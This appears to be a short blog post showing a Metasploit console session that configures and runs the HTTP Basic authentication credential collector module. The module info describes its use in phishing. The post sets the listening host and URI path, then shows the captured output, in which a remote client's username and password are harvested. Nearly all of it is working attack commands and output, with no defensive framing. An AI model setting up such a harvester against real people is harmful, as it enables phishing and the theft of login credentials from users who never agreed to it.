control – metasploit authentication credential collector

msf > use auxiliary/server/capture/http_basic
msf  auxiliary(http_basic) > info

Name: HTTP Client Basic Authentication Credential Collector
Module: auxiliary/server/capture/http_basic
Version: 0
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
saint patrick <>

Basic options:
Name        Current Setting  Required  Description
—-        —————  ——–  ———–
REALM       Secure Site      yes       The authentication realm you’d like to present.
SRVHOST          yes       The local host to listen on. This must be an address on the local machine or
SRVPORT     80               yes       The local port to listen on.
SSL         false            no        Negotiate SSL for incoming connections
SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH                      no        The URI to use for this exploit (default is random)

This module responds to all requests for resources with a HTTP 401.
This should cause most browsers to prompt for a credential. If the
user enters Basic Auth creds they are sent to the console. This may
be helpful in some phishing expeditions where it is possible to
embed a resource into a page. This attack is discussed in Chapter 3
of The Tangled Web by Michal Zalewski.

msf  auxiliary(http_basic) > set SRVHOST Local-IP-Address

msf  auxiliary(http_basic) > set URIPATH login

msf  auxiliary(http_basic) > exploit
[*] Auxiliary module execution completed

[*] Listening on Local-IP-Address:80…
[*] Using URL: http://Local-IP-Address:80/login
[*] Server started.
msf  auxiliary(http_basic) > [*] Remote-IP-Address  http_basic – Sending 401 to client

[+] Remote-IP-Address – Credential collected: “cisco:cisco” => /login

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s